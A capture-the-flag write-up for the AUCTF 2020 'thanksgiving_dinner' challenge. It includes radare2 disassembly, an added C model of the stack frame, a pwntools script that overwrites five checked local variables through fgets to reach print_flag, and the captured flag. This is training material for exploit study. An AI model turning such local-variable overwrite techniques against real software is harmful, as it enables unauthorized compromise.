Intro
This is the second pwn challenge of AUCTF 2020. It was solved 238 times and it was worth 408 points.
Description:
I just ate a huge dinner. I can barely eat anymore… so please don’t give me too much!
nc challenges.auctf.com 30011
Note: ASLR is disabled for this challenge
You can download the binary here
$ sha256sum ./thanksgiving_dinner
2307af59beead6a2377c3beb2ff26f70d5732ec6b651b5c31e58b8f692bfb70c thanksgiving_dinner
Exploitation
The program simply asks for one line of input. Feeding it a very long string does not crash it, so at first glance it does not look vulnerable to a buffer overflow:
$ ./thanksgiving_dinner
Hi!
Welcome to my program... it's a little buggy...
Hey I heard you are searching for flags! Well I've got one. :)
Here you can have part of it!
auctf{
Sorry that's all I got!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
So I checked the binary with checksec and then opened it in radare2. NX and PIE are on and there is no canary, but none of that matters for what follows: the bug only lets us overwrite local variables, not a return address, so no addresses are needed.
$ checksec ./thanksgiving_dinner
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
$ r2 -Ad ./thanksgiving_dinner
Then I found two promising functions:
[r2]> afl
.....
0x56556250 7 198 sym.vulnerable
0x56556360 3 162 sym.print_flag
....
[r2]> axt sym.vulnerable
main 0x5655623c [CALL] call sym.vulnerable
[r2]> axt sym.print_flag
sym.vulnerable 0x5655630b [CALL] call sym.print_flag
The vulnerable function is called by main, and print_flag is called by vulnerable.
So the interesting part is in vulnerable. It reads a line with fgets(buf, 0x24, stdin) into a buffer at ebp-0x2c and then compares five local variables against fixed values; if all five checks pass, print_flag is called. Each conditional jump skips the call, so the conditions we need are the inverses of the jump conditions: var_ch == 0x1337 (jne), var_10h < 0xffffffec as a signed compare, i.e. less than -20 (jge), var_18h != 0x14 (je), var_14h == 0x667463 (jne) and var_1ch == 0x2a (jne).
The 35 bytes that fgets copies run from ebp-0x2c up to ebp-0xa, so they stop well short of the saved ebp and return address (which is why the long input above did nothing), but they cover all five locals, which sit 16, 20, 24, 28 and 32 bytes into the buffer. One caveat: fgets writes its terminating NUL at byte 35, the top byte of var_ch, so that byte is 0x00 no matter what we send. That is fine here only because the top byte of 0x1337 is zero.
[r2]> pdf @sym.vulnerable
.....
│ 0x565562d9 6a24 push 0x24 ; 36
│ 0x565562db 8d45d4 lea eax, [var_2ch]
│ 0x565562de 50 push eax
│ 0x565562df e85cfdffff call sym.imp.fgets
│ 0x565562e4 83c410 add esp, 0x10
│ 0x565562e7 817df4371300. cmp dword [var_ch], 0x1337
│ ┌─< 0x565562ee 7520 jne 0x56556310
│ │ 0x565562f0 837df0ec cmp dword [var_10h], 0xffffffec
│ ┌──< 0x565562f4 7d1a jge 0x56556310
│ ││ 0x565562f6 837de814 cmp dword [var_18h], 0x14
│ ┌───< 0x565562fa 7414 je 0x56556310
│ │││ 0x565562fc 817dec637466. cmp dword [var_14h], 0x667463
│ ┌────< 0x56556303 750b jne 0x56556310
│ ││││ 0x56556305 837de42a cmp dword [var_1ch], 0x2a
│ ┌─────< 0x56556309 7505 jne 0x56556310
│ │││││ 0x5655630b e850000000 call sym.print_flag
│ └└└└└─> 0x56556310 90 nop
│ 0x56556311 8b5dfc mov ebx, dword [var_4h]
│ 0x56556314 c9 leave
└ 0x56556315 c3 ret
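To make the stack layout and the branch polarity concrete, here is a C model of the frame of sym.vulnerable, added here and not part of the original writeup or the challenge source. The offsets and constants are taken from the disassembly above; the frame size, the 0xcc filler for stale stack contents and the little-endian host are assumptions. It emulates fgets with its 0x24 limit, applies the five checks exactly as the jumps do, and builds the same payload the exploit sends, so you can see why the 36-byte payload works, why the 300-byte 'A' string did nothing, and why the NUL that fgets appends lands harmlessly on the top byte of var_ch.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame of sym.vulnerable, reconstructed from the disassembly (not the
 * challenge source): fgets writes at ebp-0x2c, and the five compared
 * locals sit above the buffer. Offsets are from the start of the buffer. */
#define FGETS_SIZE 0x24          /* push 0x24: at most 35 bytes + NUL */
#define OFF_VAR_1C (0x2c - 0x1c) /* 16 */
#define OFF_VAR_18 (0x2c - 0x18) /* 20 */
#define OFF_VAR_14 (0x2c - 0x14) /* 24 */
#define OFF_VAR_10 (0x2c - 0x10) /* 28 */
#define OFF_VAR_0C (0x2c - 0x0c) /* 32 */
#define FRAME_SIZE 0x2c          /* assumed: bytes from ebp-0x2c up to ebp */

/* Host assumed little-endian, like the i386 target. */
static int32_t rd32(const unsigned char *p) { int32_t v; memcpy(&v, p, 4); return v; }
static void wr32(unsigned char *p, uint32_t v) { memcpy(p, &v, 4); }

/* Emulate fgets(buf, FGETS_SIZE, stdin) on one input line: copy at most
 * FGETS_SIZE-1 bytes, stop after a '\n', then append the NUL terminator.
 * With a full-length input that NUL lands at buf[35], the top byte of var_ch. */
static void emulate_fgets(unsigned char *buf, const unsigned char *line, size_t len) {
    size_t n = 0;
    while (n < FGETS_SIZE - 1 && n < len) {
        buf[n] = line[n];
        n++;
        if (line[n - 1] == '\n') break;
    }
    buf[n] = '\0';
}

/* Return 1 if this line makes sym.vulnerable fall through to call sym.print_flag.
 * Every branch in the binary jumps PAST the call, so the required conditions
 * are the inverses of the jump conditions. */
int reaches_print_flag(const unsigned char *line, size_t len) {
    unsigned char frame[FRAME_SIZE];
    memset(frame, 0xcc, sizeof frame);   /* constructed stale stack contents */
    emulate_fgets(frame, line, len);
    if (rd32(frame + OFF_VAR_0C) != 0x1337)   return 0; /* jne */
    if (rd32(frame + OFF_VAR_10) >= -20)      return 0; /* jge: signed, 0xffffffec == -20 */
    if (rd32(frame + OFF_VAR_18) == 0x14)     return 0; /* je  */
    if (rd32(frame + OFF_VAR_14) != 0x667463) return 0; /* jne */
    if (rd32(frame + OFF_VAR_1C) != 0x2a)     return 0; /* jne */
    return 1;
}

/* The writeup's payload: 16 bytes of filler, then the five dwords. out needs 36 bytes. */
size_t build_payload(unsigned char *out) {
    memset(out, 'A', OFF_VAR_1C);
    wr32(out + OFF_VAR_1C, 0x2a);
    wr32(out + OFF_VAR_18, 0x15);       /* anything but 0x14 */
    wr32(out + OFF_VAR_14, 0x667463);
    wr32(out + OFF_VAR_10, 0xffffffeb); /* -21 < -20 */
    wr32(out + OFF_VAR_0C, 0x1337);     /* byte 35 is 0x00 anyway; fgets overwrites it with NUL */
    return OFF_VAR_0C + 4;
}

size_t payload_length(void) { unsigned char p[64]; return build_payload(p); }

int payload_reaches_flag(void) {
    unsigned char p[64];
    size_t n = build_payload(p);
    return reaches_print_flag(p, n);
}

/* sendline() appends '\n'; fgets never reads it because the 35-byte limit is hit first. */
int payload_with_newline_reaches_flag(void) {
    unsigned char p[64];
    size_t n = build_payload(p);
    p[n++] = '\n';
    return reaches_print_flag(p, n);
}

/* The long 'A' input from the start of the writeup: fgets truncates it, nothing is smashed. */
int long_as_reach_flag(void) {
    unsigned char p[300];
    memset(p, 'A', sizeof p);
    return reaches_print_flag(p, sizeof p);
}

/* Flip var_18h to the one forbidden value to confirm the je branch is modelled. */
int var18_equal_0x14_reaches_flag(void) {
    unsigned char p[64];
    size_t n = build_payload(p);
    wr32(p + OFF_VAR_18, 0x14);
    return reaches_print_flag(p, n);
}

int main(void) {
    printf("payload (%zu bytes) reaches print_flag: %d\n", payload_length(), payload_reaches_flag());
    return 0;
}
```

If the last check had been something like 0x13371337 instead of 0x1337, this bug would not have been enough: the NUL that fgets appends at byte 35 would always clobber the top byte of var_ch.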
So this is my exploit (the values follow the checks above; the binary name matches the one downloaded earlier):
#!/usr/bin/python2
import os
import sys
from pwn import *

# No addresses are needed: we only overwrite locals below the return address.
prog = context.binary = ELF(os.path.join(os.getcwd(), "thanksgiving_dinner"), checksec=False)

if len(sys.argv) > 1:
    t = remote("challenges.auctf.com", 30011)
else:
    t = prog.process()

# fgets(buf, 0x24, stdin) copies at most 35 bytes into the buffer at ebp-0x2c,
# so the checked locals at ebp-0x1c .. ebp-0xc start 16 .. 32 bytes into it.
offset = 16
payload = b"A" * offset
payload += p32(0x2a)        # var_1ch == 0x2a
payload += p32(0x15)        # var_18h != 0x14
payload += p32(0x667463)    # var_14h == 0x667463
payload += p32(0xffffffeb)  # var_10h < 0xffffffec as signed (-21 < -20)
payload += p32(0x1337)      # var_ch == 0x1337; fgets' NUL supplies the final 0x00 byte

t.sendline(payload)
t.interactive()
t.close()
And this is the flag:
$ cat flag.txt
auctf{I_s@id_1_w@s_fu11!}